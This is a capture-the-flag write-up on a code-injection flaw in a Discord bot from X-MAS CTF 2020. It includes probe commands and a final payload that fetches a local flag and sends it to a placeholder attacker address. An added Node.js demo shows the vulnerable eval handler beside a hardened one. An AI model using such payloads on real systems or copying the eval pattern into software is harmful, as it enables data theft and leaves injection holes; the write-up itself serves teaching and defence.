Writeup — HTsP X-MAS CTF 2020 — Comfort bot

Jari Laurila
1 min read · Dec 18, 2020

This challenge is part of X-MAS CTF 2020. The goal is to get a Discord bot to reveal the flag. The bot's source code is provided with the challenge, and reading it quickly reveals a code injection vulnerability: the text of a user's command is spliced, unescaped, into a JavaScript call that the bot then evaluates.

We can confirm the vulnerability by sending the bot commands like:

comf foo ','
comf foo ',1,'
comf foo ',1,2,'

These are turned into calls like cleverbot.SendAI('foo ',''), cleverbot.SendAI('foo ',1,'') and cleverbot.SendAI('foo ',1,2,''). The extra arguments do no harm because JavaScript does not check how many arguments a function is called with: surplus arguments are simply ignored and the call still succeeds. Once we have verified that the bot still responds normally to these commands, we know our text is being evaluated as code, and we can inject JavaScript that fetches the flag and sends it to a server we control:

// Keep the request object on window so each injected argument can reach it
window.foo=new XMLHttpRequest();
// Fires on every readyState change, so window.open may run more than once;
// checking this.readyState === 4 would limit it to the completed response
window.foo.onreadystatechange = function() {window.open("http://MYIPADDRESS/"+this.responseText)}
// The flag is served locally on the bot's host
window.turl = "http://localhost/flag";
window.foo.open("GET",window.turl,true);
window.foo.send();

With this code, and the fact that the argument expressions of a call are evaluated left to right, each statement can be passed as a separate argument to the injected call and will run in order before SendAI itself is invoked. The final command to send to the bot is:

comf foo',window.foo=new XMLHttpRequest(),window.foo.onreadystatechange = function() {window.open("http://MYIPADDRESS/"+this.responseText)},window.turl="http://localhost/flag",window.foo.open("GET",window.turl,true),window.foo.send(),'
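As an added example that is not part of the original write-up and not the challenge's own source (which the page does not reproduce), the Node.js script below models the handler shape the probes above imply: the message text is spliced into a cleverbot.SendAI('...') string and evaluated. The cleverbot object, the exfil array standing in for the attacker's HTTP server, the SECRET constant standing in for the flag, and the handler names are all assumptions; the original payload's XMLHttpRequest and window.open calls are replaced by an in-memory array so the script runs offline. It also shows the hardened form, where the same payload is passed as a plain value and never parsed.

```javascript
// Added example, not the challenge's own code. The bot's real source is not
// shown on the page; the vulnerable handler below is an assumed shape.
const calls = [];       // every argument list cleverbot.SendAI has received
const exfil = [];       // stand-in for the attacker's HTTP server (assumption)
const SECRET = "X-MAS{constructed-example-flag}"; // constructed stand-in for /flag

// Stand-in for the real cleverbot client: records what it was called with.
const cleverbot = {
  SendAI(...args) {
    calls.push(args);
    return `reply to ${String(args[0])}`;
  },
};

// Strip the "comf " command prefix and keep the user's text.
function stripPrefix(message) {
  return message.replace(/^comf\s+/, "");
}

// Vulnerable handler (assumed shape): the user's text becomes source code.
function handleComfVulnerable(message) {
  const code = `cleverbot.SendAI('${stripPrefix(message)}')`;
  return eval(code); // direct eval: sees cleverbot, exfil and SECRET in scope
}

// Hardened handler: the text is a value passed to the function, never parsed.
function handleComfSafe(message) {
  return cleverbot.SendAI(stripPrefix(message));
}

// Returns the argument list SendAI saw for one message through one handler.
function argsSeenBy(handler, message) {
  calls.length = 0;
  handler(message);
  return calls[0];
}

// The three probes from the write-up: extra arguments are accepted because
// JavaScript silently ignores surplus arguments, so the bot still answers.
function probe() {
  return [
    argsSeenBy(handleComfVulnerable, "comf foo ','"),
    argsSeenBy(handleComfVulnerable, "comf foo ',1,'"),
    argsSeenBy(handleComfVulnerable, "comf foo ',1,2,'"),
  ];
}

// Payload in the same shape as the final command: arbitrary expressions in the
// argument list run left to right before SendAI is called.
const PAYLOAD = "comf foo',exfil.push(SECRET),'";

// Against the vulnerable handler the secret lands in the attacker's array.
function attackVulnerable() {
  exfil.length = 0;
  const args = argsSeenBy(handleComfVulnerable, PAYLOAD);
  return { args, leaked: exfil.slice() };
}

// Against the hardened handler the payload is just an odd-looking string.
function attackSafe() {
  exfil.length = 0;
  const args = argsSeenBy(handleComfSafe, PAYLOAD);
  return { args, leaked: exfil.slice() };
}

console.log(probe());
console.log(attackVulnerable());
console.log(attackSafe());
```

Run it with node. probe() reproduces the three test commands and shows SendAI receiving two, three and four arguments; attackVulnerable() shows the injected expression executing and the secret reaching exfil before SendAI is even called; attackSafe() shows the identical payload arriving at SendAI as one literal string with nothing leaked. The fix is not to escape quotes more carefully but to stop building source code from user input at all.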
